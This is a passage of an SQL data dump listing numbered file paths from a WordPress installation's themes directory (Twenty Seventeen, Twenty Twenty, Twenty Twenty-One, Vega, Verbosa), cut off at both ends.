),(5739,'wp-content/themes/twentyseventeen/template-parts/post/content-audio.php'),(5740,'wp-content/themes/twentyseventeen/template-parts/post/content-excerpt.php'),(5741,'wp-content/themes/twentyseventeen/template-parts/post/content-gallery.php'),(5742,'wp-content/themes/twentyseventeen/template-parts/post/content-image.php'),(5743,'wp-content/themes/twentyseventeen/template-parts/post/content-none.php'),(5744,'wp-content/themes/twentyseventeen/template-parts/post/content-video.php'),(5745,'wp-content/themes/twentyseventeen/template-parts/post/content.php'),(5746,'wp-content/themes/twentytwenty/.stylelintrc.json'),(5747,'wp-content/themes/twentytwenty/404.php'),(5748,'wp-content/themes/twentytwenty/assets/css/editor-style-block-rtl.css'),(5749,'wp-content/themes/twentytwenty/assets/css/editor-style-block.css'),(5750,'wp-content/themes/twentytwenty/assets/css/editor-style-classic-rtl.css'),(5751,'wp-content/themes/twentytwenty/assets/css/editor-style-classic.css'),(5752,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-italic-var.woff2'),(5753,'wp-content/themes/twentytwenty/assets/fonts/inter/Inter-upright-var.woff2'),(5754,'wp-content/themes/twentytwenty/assets/images/2020-landscape-1.png'),(5755,'wp-content/themes/twentytwenty/assets/images/2020-landscape-2.png'),(5756,'wp-content/themes/twentytwenty/assets/images/2020-square-1.png'),(5757,'wp-content/themes/twentytwenty/assets/images/2020-square-2.png'),(5758,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-1.png'),(5759,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-2.png'),(5760,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-3.png'),(5761,'wp-content/themes/twentytwenty/assets/images/2020-three-quarters-4.png'),(5762,'wp-content/themes/twentytwenty/assets/js/color-calculations.js'),(5763,'wp-content/themes/twentytwenty/assets/js/customize-controls.js'),(5764,'wp-content/themes/twentytwenty/assets/js/customize-preview.js'),(5765,'wp-content/themes/twentytwenty/assets/js/customize.js'),(5766,'wp-content/themes/twentytwenty/assets/js/editor-script-block.js'),(5767,'wp-content/themes/twentytwenty/assets/js/index.js'),(5768,'wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js'),(5769,'wp-content/themes/twentytwenty/classes/class-twentytwenty-customize.php'),(5770,'wp-content/themes/twentytwenty/classes/class-twentytwenty-non-latin-languages.php'),(5771,'wp-content/themes/twentytwenty/classes/class-twentytwenty-script-loader.php'),(5772,'wp-content/themes/twentytwenty/classes/class-twentytwenty-separator-control.php'),(5773,'wp-content/themes/twentytwenty/classes/class-twentytwenty-svg-icons.php'),(5774,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-comment.php'),(5775,'wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php'),(5776,'wp-content/themes/twentytwenty/comments.php'),(5777,'wp-content/themes/twentytwenty/footer.php'),(5778,'wp-content/themes/twentytwenty/functions.php'),(5779,'wp-content/themes/twentytwenty/header.php'),(5780,'wp-content/themes/twentytwenty/inc/block-patterns.php'),(5781,'wp-content/themes/twentytwenty/inc/custom-css.php'),(5782,'wp-content/themes/twentytwenty/inc/starter-content.php'),(5783,'wp-content/themes/twentytwenty/inc/svg-icons.php'),(5784,'wp-content/themes/twentytwenty/inc/template-tags.php'),(5785,'wp-content/themes/twentytwenty/index.php'),(5786,'wp-content/themes/twentytwenty/package-lock.json'),(5787,'wp-content/themes/twentytwenty/package.json'),(5788,'wp-content/themes/twentytwenty/print.css'),(5789,'wp-content/themes/twentytwenty/readme.txt'),(5790,'wp-content/themes/twentytwenty/screenshot.png'),(5791,'wp-content/themes/twentytwenty/searchform.php'),(5792,'wp-content/themes/twentytwenty/singular.php'),(5793,'wp-content/themes/twentytwenty/style-rtl.css'),(5794,'wp-content/themes/twentytwenty/style.css'),(5795,'wp-content/themes/twentytwenty/template-parts/content-cover.php'),(5796,'wp-content/themes/twentytwenty/template-parts/content.php'),(5797,'wp-content/themes/twentytwenty/template-parts/entry-author-bio.php'),(5798,'wp-content/themes/twentytwenty/template-parts/entry-header.php'),(5799,'wp-content/themes/twentytwenty/template-parts/featured-image.php'),(5800,'wp-content/themes/twentytwenty/template-parts/footer-menus-widgets.php'),(5801,'wp-content/themes/twentytwenty/template-parts/modal-menu.php'),(5802,'wp-content/themes/twentytwenty/template-parts/modal-search.php'),(5803,'wp-content/themes/twentytwenty/template-parts/navigation.php'),(5804,'wp-content/themes/twentytwenty/template-parts/pagination.php'),(5805,'wp-content/themes/twentytwenty/templates/template-cover.php'),(5806,'wp-content/themes/twentytwenty/templates/template-full-width.php'),(5807,'wp-content/themes/twentytwentyone/.stylelintignore'),(5808,'wp-content/themes/twentytwentyone/.stylelintrc-css.json'),(5809,'wp-content/themes/twentytwentyone/.stylelintrc.json'),(5810,'wp-content/themes/twentytwentyone/404.php'),(5811,'wp-content/themes/twentytwentyone/archive.php'),(5812,'wp-content/themes/twentytwentyone/assets/css/custom-color-overrides.css'),(5813,'wp-content/themes/twentytwentyone/assets/css/ie-editor.css'),(5814,'wp-content/themes/twentytwentyone/assets/css/ie.css'),(5815,'wp-content/themes/twentytwentyone/assets/css/print.css'),(5816,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode-rtl.css'),(5817,'wp-content/themes/twentytwentyone/assets/css/style-dark-mode.css'),(5818,'wp-content/themes/twentytwentyone/assets/css/style-editor-customizer.css'),(5819,'wp-content/themes/twentytwentyone/assets/css/style-editor.css'),(5820,'wp-content/themes/twentytwentyone/assets/images/Daffodils.jpg'),(5821,'wp-content/themes/twentytwentyone/assets/images/Reading.jpg'),(5822,'wp-content/themes/twentytwentyone/assets/images/in-the-bois-de-boulogne.jpg'),(5823,'wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg'),(5824,'wp-content/themes/twentytwentyone/assets/images/roses-tremieres-hollyhocks-1884.jpg'),(5825,'wp-content/themes/twentytwentyone/assets/images/self-portrait-1885.jpg'),(5826,'wp-content/themes/twentytwentyone/assets/images/the-garden-at-bougival-1884.jpg'),(5827,'wp-content/themes/twentytwentyone/assets/images/villa-with-orange-trees-nice.jpg'),(5828,'wp-content/themes/twentytwentyone/assets/images/young-woman-in-mauve.jpg'),(5829,'wp-content/themes/twentytwentyone/assets/js/customize-helpers.js'),(5830,'wp-content/themes/twentytwentyone/assets/js/customize-preview.js'),(5831,'wp-content/themes/twentytwentyone/assets/js/customize.js'),(5832,'wp-content/themes/twentytwentyone/assets/js/dark-mode-toggler.js'),(5833,'wp-content/themes/twentytwentyone/assets/js/editor-dark-mode-support.js'),(5834,'wp-content/themes/twentytwentyone/assets/js/editor.js'),(5835,'wp-content/themes/twentytwentyone/assets/js/palette-colorpicker.js'),(5836,'wp-content/themes/twentytwentyone/assets/js/polyfills.js'),(5837,'wp-content/themes/twentytwentyone/assets/js/primary-navigation.js'),(5838,'wp-content/themes/twentytwentyone/assets/js/responsive-embeds.js'),(5839,'wp-content/themes/twentytwentyone/assets/js/skip-link-focus-fix.js'),(5840,'wp-content/themes/twentytwentyone/assets/sass/01-settings/file-header.scss'),(5841,'wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss'),(5842,'wp-content/themes/twentytwentyone/assets/sass/01-settings/global.scss'),(5843,'wp-content/themes/twentytwentyone/assets/sass/02-tools/functions.scss'),(5844,'wp-content/themes/twentytwentyone/assets/sass/02-tools/mixins.scss'),(5845,'wp-content/themes/twentytwentyone/assets/sass/03-generic/breakpoints.scss'),(5846,'wp-content/themes/twentytwentyone/assets/sass/03-generic/clearings.scss'),(5847,'wp-content/themes/twentytwentyone/assets/sass/03-generic/normalize.scss'),(5848,'wp-content/themes/twentytwentyone/assets/sass/03-generic/reset.scss'),(5849,'wp-content/themes/twentytwentyone/assets/sass/03-generic/vertical-margins.scss'),(5850,'wp-content/themes/twentytwentyone/assets/sass/04-elements/blockquote.scss'),(5851,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms-editor.scss'),(5852,'wp-content/themes/twentytwentyone/assets/sass/04-elements/forms.scss'),(5853,'wp-content/themes/twentytwentyone/assets/sass/04-elements/links.scss'),(5854,'wp-content/themes/twentytwentyone/assets/sass/04-elements/media.scss'),(5855,'wp-content/themes/twentytwentyone/assets/sass/04-elements/misc.scss'),(5856,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/_config.scss'),(5857,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss'),(5858,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks-editor.scss'),(5859,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/blocks.scss'),(5860,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_editor.scss'),(5861,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/button/_style.scss'),(5862,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss'),(5863,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_style.scss'),(5864,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_editor.scss'),(5865,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/columns/_style.scss'),(5866,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_editor.scss'),(5867,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/cover/_style.scss'),(5868,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_editor.scss'),(5869,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/file/_style.scss'),(5870,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_editor.scss'),(5871,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/gallery/_style.scss'),(5872,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_editor.scss'),(5873,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/group/_style.scss'),(5874,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_editor.scss'),(5875,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/heading/_style.scss'),(5876,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/html/_editor.scss'),(5877,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_editor.scss'),(5878,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/image/_style.scss'),(5879,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_editor.scss'),(5880,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-comments/_style.scss'),(5881,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_editor.scss'),(5882,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/latest-posts/_style.scss'),(5883,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_editor.scss'),(5884,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/legacy/_style.scss'),(5885,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_editor.scss'),(5886,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/list/_style.scss'),(5887,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_editor.scss'),(5888,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/media-text/_style.scss'),(5889,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_editor.scss'),(5890,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss'),(5891,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_editor.scss'),(5892,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss'),(5893,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_editor.scss'),(5894,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/preformatted/_style.scss'),(5895,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_editor.scss'),(5896,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss'),(5897,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_editor.scss'),(5898,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss'),(5899,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_editor.scss'),(5900,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss'),(5901,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_editor.scss'),(5902,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/search/_style.scss'),(5903,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_editor.scss'),(5904,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/separator/_style.scss'),(5905,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_editor.scss'),(5906,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/social-icons/_style.scss'),(5907,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/spacer/_style.scss'),(5908,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_editor.scss'),(5909,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/table/_style.scss'),(5910,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_editor.scss'),(5911,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/tag-clould/_style.scss'),(5912,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_editor.scss'),(5913,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_font-sizes.scss'),(5914,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/utilities/_style.scss'),(5915,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_editor.scss'),(5916,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/verse/_style.scss'),(5917,'wp-content/themes/twentytwentyone/assets/sass/05-blocks/video/_style.scss'),(5918,'wp-content/themes/twentytwentyone/assets/sass/06-components/404.scss'),(5919,'wp-content/themes/twentytwentyone/assets/sass/06-components/archives.scss'),(5920,'wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss'),(5921,'wp-content/themes/twentytwentyone/assets/sass/06-components/editor.scss'),(5922,'wp-content/themes/twentytwentyone/assets/sass/06-components/entry.scss'),(5923,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer-navigation.scss'),(5924,'wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss'),(5925,'wp-content/themes/twentytwentyone/assets/sass/06-components/header.scss'),(5926,'wp-content/themes/twentytwentyone/assets/sass/06-components/navigation.scss'),(5927,'wp-content/themes/twentytwentyone/assets/sass/06-components/pagination.scss'),(5928,'wp-content/themes/twentytwentyone/assets/sass/06-components/posts-and-pages.scss'),(5929,'wp-content/themes/twentytwentyone/assets/sass/06-components/search.scss'),(5930,'wp-content/themes/twentytwentyone/assets/sass/06-components/single.scss'),(5931,'wp-content/themes/twentytwentyone/assets/sass/06-components/widgets.scss'),(5932,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/a11y.scss'),(5933,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/color-palette.scss'),(5934,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/ie.scss'),(5935,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/measure.scss'),(5936,'wp-content/themes/twentytwentyone/assets/sass/07-utilities/print.scss'),(5937,'wp-content/themes/twentytwentyone/assets/sass/style-dark-mode.scss'),(5938,'wp-content/themes/twentytwentyone/assets/sass/style-editor.scss'),(5939,'wp-content/themes/twentytwentyone/assets/sass/style.scss'),(5940,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-custom-colors.php'),(5941,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-color-control.php'),(5942,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize-notice-control.php'),(5943,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-customize.php'),(5944,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-dark-mode.php'),(5945,'wp-content/themes/twentytwentyone/classes/class-twenty-twenty-one-svg-icons.php'),(5946,'wp-content/themes/twentytwentyone/comments.php'),(5947,'wp-content/themes/twentytwentyone/footer.php'),(5948,'wp-content/themes/twentytwentyone/functions.php'),(5949,'wp-content/themes/twentytwentyone/header.php'),(5950,'wp-content/themes/twentytwentyone/image.php'),(5951,'wp-content/themes/twentytwentyone/inc/back-compat.php'),(5952,'wp-content/themes/twentytwentyone/inc/block-patterns.php'),(5953,'wp-content/themes/twentytwentyone/inc/block-styles.php'),(5954,'wp-content/themes/twentytwentyone/inc/custom-css.php'),(5955,'wp-content/themes/twentytwentyone/inc/menu-functions.php'),(5956,'wp-content/themes/twentytwentyone/inc/starter-content.php'),(5957,'wp-content/themes/twentytwentyone/inc/template-functions.php'),(5958,'wp-content/themes/twentytwentyone/inc/template-tags.php'),(5959,'wp-content/themes/twentytwentyone/index.php'),(5960,'wp-content/themes/twentytwentyone/package-lock.json'),(5961,'wp-content/themes/twentytwentyone/package.json'),(5962,'wp-content/themes/twentytwentyone/page.php'),(5963,'wp-content/themes/twentytwentyone/postcss.config.js'),(5964,'wp-content/themes/twentytwentyone/readme.txt'),(5965,'wp-content/themes/twentytwentyone/screenshot.png'),(5966,'wp-content/themes/twentytwentyone/search.php'),(5967,'wp-content/themes/twentytwentyone/searchform.php'),(5968,'wp-content/themes/twentytwentyone/single.php'),(5969,'wp-content/themes/twentytwentyone/style-rtl.css'),(5970,'wp-content/themes/twentytwentyone/style.css'),(5971,'wp-content/themes/twentytwentyone/template-parts/content/content-excerpt.php'),(5972,'wp-content/themes/twentytwentyone/template-parts/content/content-none.php'),(5973,'wp-content/themes/twentytwentyone/template-parts/content/content-page.php'),(5974,'wp-content/themes/twentytwentyone/template-parts/content/content-single.php'),(5975,'wp-content/themes/twentytwentyone/template-parts/content/content.php'),(5976,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php'),(5977,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-audio.php'),(5978,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-chat.php'),(5979,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-gallery.php'),(5980,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-image.php'),(5981,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php'),(5982,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-quote.php'),(5983,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-status.php'),(5984,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-video.php'),(5985,'wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt.php'),(5986,'wp-content/themes/twentytwentyone/template-parts/footer/footer-widgets.php'),(5987,'wp-content/themes/twentytwentyone/template-parts/header/entry-header.php'),(5988,'wp-content/themes/twentytwentyone/template-parts/header/excerpt-header.php'),(5989,'wp-content/themes/twentytwentyone/template-parts/header/site-branding.php'),(5990,'wp-content/themes/twentytwentyone/template-parts/header/site-header.php'),(5991,'wp-content/themes/twentytwentyone/template-parts/header/site-nav.php'),(5992,'wp-content/themes/twentytwentyone/template-parts/post/author-bio.php'),(5993,'wp-content/themes/vega/404.php'),(5994,'wp-content/themes/vega/assets/css/animate.css'),(5995,'wp-content/themes/vega/assets/css/bootstrap-social.css'),(5996,'wp-content/themes/vega/assets/css/bootstrap.css'),(5997,'wp-content/themes/vega/assets/css/bootstrap.min.css'),(5998,'wp-content/themes/vega/assets/css/font-awesome.css'),(5999,'wp-content/themes/vega/assets/css/font-awesome.min.css'),(6000,'wp-content/themes/vega/assets/fonts/FontAwesome.otf'),(6001,'wp-content/themes/vega/assets/fonts/fontawesome-webfont.eot'),(6002,'wp-content/themes/vega/assets/fonts/fontawesome-webfont.svg'),(6003,'wp-content/themes/vega/assets/fonts/fontawesome-webfont.ttf'),(6004,'wp-content/themes/vega/assets/fonts/fontawesome-webfont.woff'),(6005,'wp-content/themes/vega/assets/fonts/fontawesome-webfont.woff2'),(6006,'wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.eot'),(6007,'wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.svg'),(6008,'wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.ttf'),(6009,'wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.woff'),(6010,'wp-content/themes/vega/assets/fonts/glyphicons-halflings-regular.woff2'),(6011,'wp-content/themes/vega/assets/img/bg_slide.png'),(6012,'wp-content/themes/vega/assets/img/ico_arrow_lr_black.png'),(6013,'wp-content/themes/vega/assets/img/ico_arrow_lr_white.png'),(6014,'wp-content/themes/vega/assets/img/ico_arrow_ud_black.png'),(6015,'wp-content/themes/vega/assets/img/ico_arrow_ud_white.png'),(6016,'wp-content/themes/vega/assets/js/bootstrap.js'),(6017,'wp-content/themes/vega/assets/js/bootstrap.min.js'),(6018,'wp-content/themes/vega/assets/js/html5shiv.js'),(6019,'wp-content/themes/vega/assets/js/jquery.smartmenus.bootstrap.js'),(6020,'wp-content/themes/vega/assets/js/jquery.smartmenus.bootstrap.min.js'),(6021,'wp-content/themes/vega/assets/js/jquery.smartmenus.js'),(6022,'wp-content/themes/vega/assets/js/jquery.smartmenus.min.js'),(6023,'wp-content/themes/vega/assets/js/parallax.js'),(6024,'wp-content/themes/vega/assets/js/parallax.min.js'),(6025,'wp-content/themes/vega/assets/js/respond.js'),(6026,'wp-content/themes/vega/assets/js/respond.min.js'),(6027,'wp-content/themes/vega/assets/js/vega-wp-anim.js'),(6028,'wp-content/themes/vega/assets/js/vega-wp.js'),(6029,'wp-content/themes/vega/assets/js/wow.js'),(6030,'wp-content/themes/vega/assets/js/wow.min.js'),(6031,'wp-content/themes/vega/changelog.txt'),(6032,'wp-content/themes/vega/color-schemes/blue.css'),(6033,'wp-content/themes/vega/color-schemes/green.css'),(6034,'wp-content/themes/vega/color-schemes/orange.css'),(6035,'wp-content/themes/vega/comments.php'),(6036,'wp-content/themes/vega/customize/customizer.php'),(6037,'wp-content/themes/vega/customize/style.css'),(6038,'wp-content/themes/vega/customize/theme-defaults.php'),(6039,'wp-content/themes/vega/footer.php'),(6040,'wp-content/themes/vega/front-page.php'),(6041,'wp-content/themes/vega/functions.php'),(6042,'wp-content/themes/vega/header.php'),(6043,'wp-content/themes/vega/includes/wp_bootstrap_navwalker.php'),(6044,'wp-content/themes/vega/index.php'),(6045,'wp-content/themes/vega/languages/vega.pot'),(6046,'wp-content/themes/vega/page.php'),(6047,'wp-content/themes/vega/parts/banner-custom-header.php'),(6048,'wp-content/themes/vega/parts/banner-featured-image.php'),(6049,'wp-content/themes/vega/parts/banner-none.php'),(6050,'wp-content/themes/vega/parts/banner.php'),(6051,'wp-content/themes/vega/parts/content-recent.php'),(6052,'wp-content/themes/vega/parts/content.php'),(6053,'wp-content/themes/vega/parts/footer-back-to-top.php'),(6054,'wp-content/themes/vega/parts/frontpage-4cols.php'),(6055,'wp-content/themes/vega/parts/frontpage-banner.php'),(6056,'wp-content/themes/vega/parts/frontpage-content.php'),(6057,'wp-content/themes/vega/parts/frontpage-cta-dark.php'),(6058,'wp-content/themes/vega/parts/frontpage-cta-dark2.php'),(6059,'wp-content/themes/vega/parts/frontpage-latest-posts.php'),(6060,'wp-content/themes/vega/parts/frontpage-open1.php'),(6061,'wp-content/themes/vega/parts/header-logo.php'),(6062,'wp-content/themes/vega/parts/header-top.php'),(6063,'wp-content/themes/vega/readme.txt'),(6064,'wp-content/themes/vega/sample/images/cta-parallax-bg.png'),(6065,'wp-content/themes/vega/sample/images/cta-parallax-bg2.png'),(6066,'wp-content/themes/vega/sample/images/featured-image-1.jpg'),(6067,'wp-content/themes/vega/sample/images/featured-image-10.jpg'),(6068,'wp-content/themes/vega/sample/images/featured-image-2.jpg'),(6069,'wp-content/themes/vega/sample/images/featured-image-3.jpg'),(6070,'wp-content/themes/vega/sample/images/featured-image-4.jpg'),(6071,'wp-content/themes/vega/sample/images/featured-image-5.jpg'),(6072,'wp-content/themes/vega/sample/images/featured-image-6.jpg'),(6073,'wp-content/themes/vega/sample/images/featured-image-7.jpg'),(6074,'wp-content/themes/vega/sample/images/featured-image-8.jpg'),(6075,'wp-content/themes/vega/sample/images/featured-image-9.jpg'),(6076,'wp-content/themes/vega/sample/images/full-1.jpg'),(6077,'wp-content/themes/vega/sample/images/full-2.jpg'),(6078,'wp-content/themes/vega/sample/images/full-3.jpg'),(6079,'wp-content/themes/vega/sample/images/full-4.jpg'),(6080,'wp-content/themes/vega/sample/images/full-5.jpg'),(6081,'wp-content/themes/vega/sample/images/header.jpg'),(6082,'wp-content/themes/vega/sample/images/recent-news-1.jpg'),(6083,'wp-content/themes/vega/sample/images/recent-news-2.jpg'),(6084,'wp-content/themes/vega/sample/images/recent-news-3.jpg'),(6085,'wp-content/themes/vega/screenshot.png'),(6086,'wp-content/themes/vega/searchform.php'),(6087,'wp-content/themes/vega/sidebar-footer.php'),(6088,'wp-content/themes/vega/sidebar.php'),(6089,'wp-content/themes/vega/single.php'),(6090,'wp-content/themes/vega/style.css'),(6091,'wp-content/themes/vega/woocommerce.php'),(6092,'wp-content/themes/verbosa/404.php'),(6093,'wp-content/themes/verbosa/admin/css/admin.css'),(6094,'wp-content/themes/verbosa/admin/defaults.php'),(6095,'wp-content/themes/verbosa/admin/images/1c.png'),(6096,'wp-content/themes/verbosa/admin/images/2cSl.png'),(6097,'wp-content/themes/verbosa/admin/images/2cSr.png'),(6098,'wp-content/themes/verbosa/admin/images/coffee.png'),(6099,'wp-content/themes/verbosa/admin/images/image-style-0.png'),(6100,'wp-content/themes/verbosa/admin/images/image-style-1.png'),(6101,'wp-content/themes/verbosa/admin/images/image-style-2.png'),(6102,'wp-content/themes/verbosa/admin/images/image-style-3.png'),(6103,'wp-content/themes/verbosa/admin/images/image-style-4.png'),(6104,'wp-content/themes/verbosa/admin/images/image-style-5.png'),(6105,'wp-content/themes/verbosa/admin/images/logo-about-customize.png'),(6106,'wp-content/themes/verbosa/admin/images/logo-about-top.png'),(6107,'wp-content/themes/verbosa/admin/images/logo-customizer.png'),(6108,'wp-content/themes/verbosa/admin/images/magazine-1col.png'),(6109,'wp-content/themes/verbosa/admin/images/magazine-2col.png'),(6110,'wp-content/themes/verbosa/admin/images/magazine-3col.png'),(6111,'wp-content/themes/verbosa/admin/js/admin.js'),(6112,'wp-content/themes/verbosa/admin/main.php'),(6113,'wp-content/themes/verbosa/admin/options.php'),(6114,'wp-content/themes/verbosa/archive.php'),(6115,'wp-content/themes/verbosa/attachment.php'),(6116,'wp-content/themes/verbosa/author.php'),(6117,'wp-content/themes/verbosa/comments.php'),(6118,'wp-content/themes/verbosa/content/content-aside.php'),(6119,'wp-content/themes/verbosa/content/content-audio.php'),(6120,'wp-content/themes/verbosa/content/content-chat.php'),(6121,'wp-content/themes/verbosa/content/content-gallery.php'),(6122,'wp-content/themes/verbosa/content/content-image.php'),(6123,'wp-content/themes/verbosa/content/content-index.php'),(6124,'wp-content/themes/verbosa/content/content-link.php'),(6125,'wp-content/themes/verbosa/content/content-notfound.php'),(6126,'wp-content/themes/verbosa/content/content-page.php'),(6127,'wp-content/themes/verbosa/content/content-quote.php'),(6128,'wp-content/themes/verbosa/content/content-status.php'),(6129,'wp-content/themes/verbosa/content/content-video.php'),(6130,'wp-content/themes/verbosa/content/content.php'),(6131,'wp-content/themes/verbosa/cryout/admin-functions.php'),(6132,'wp-content/themes/verbosa/cryout/ajax.php'),(6133,'wp-content/themes/verbosa/cryout/back-compat.php'),(6134,'wp-content/themes/verbosa/cryout/css/customizer.css'),(6135,'wp-content/themes/verbosa/cryout/css/jquery-ui.structure.css'),(6136,'wp-content/themes/verbosa/cryout/css/jquery-ui.theme.css'),(6137,'wp-content/themes/verbosa/cryout/css/widgets.css'),(6138,'wp-content/themes/verbosa/cryout/customizer.php'),(6139,'wp-content/themes/verbosa/cryout/framework.php'),(6140,'wp-content/themes/verbosa/cryout/js/ajax.js'),(6141,'wp-content/themes/verbosa/cryout/js/customizer-controls.js'),(6142,'wp-content/themes/verbosa/cryout/js/customizer.js'),(6143,'wp-content/themes/verbosa/cryout/js/widgets.js'),(6144,'wp-content/themes/verbosa/cryout/prototypes.php'),(6145,'wp-content/themes/verbosa/footer.php'),(6146,'wp-content/themes/verbosa/functions.php'),(6147,'wp-content/themes/verbosa/header.php'),(6148,'wp-content/themes/verbosa/includes/admin-functions.php'),(6149,'wp-content/themes/verbosa/includes/comments.php'),(6150,'wp-content/themes/verbosa/includes/core.php'),(6151,'wp-content/themes/verbosa/includes/custom-styles.php'),(6152,'wp-content/themes/verbosa/includes/hooks.php'),(6153,'wp-content/themes/verbosa/includes/loop.php'),(6154,'wp-content/themes/verbosa/includes/main.php'),(6155,'wp-content/themes/verbosa/includes/setup.php'),(6156,'wp-content/themes/verbosa/includes/styles.php'),(6157,'wp-content/themes/verbosa/index.php'),(6158,'wp-content/themes/verbosa/languages/verbosa.pot'),(6159,'wp-content/themes/verbosa/page.php'),(6160,'wp-content/themes/verbosa/readme.txt'),(6161,'wp-content/themes/verbosa/resources/fonts/fontello.eot'),(6162,'wp-content/themes/verbosa/resources/fonts/fontello.svg'),(6163,'wp-content/themes/verbosa/resources/fonts/fontello.ttf'),(6164,'wp-content/themes/verbosa/resources/fonts/fontello.woff'),(6165,'wp-content/themes/verbosa/resources/fonts/fontfaces.css'),(6166,'wp-content/themes/verbosa/resources/fonts/icomoon.eot'),(6167,'wp-content/themes/verbosa/resources/fonts/icomoon.svg'),(6168,'wp-content/themes/verbosa/resources/fonts/icomoon.ttf'),(6169,'wp-content/themes/verbosa/resources/fonts/icomoon.woff'),(6170,'wp-content/themes/verbosa/resources/images/headers/breakfast.jpg'),(6171,'wp-content/themes/verbosa/resources/images/headers/homeoffice.jpg'),(6172,'wp-content/themes/verbosa/resources/images/headers/typewriter.jpg'),(6173,'wp-content/themes/verbosa/resources/js/frontend.js'),(6174,'wp-content/themes/verbos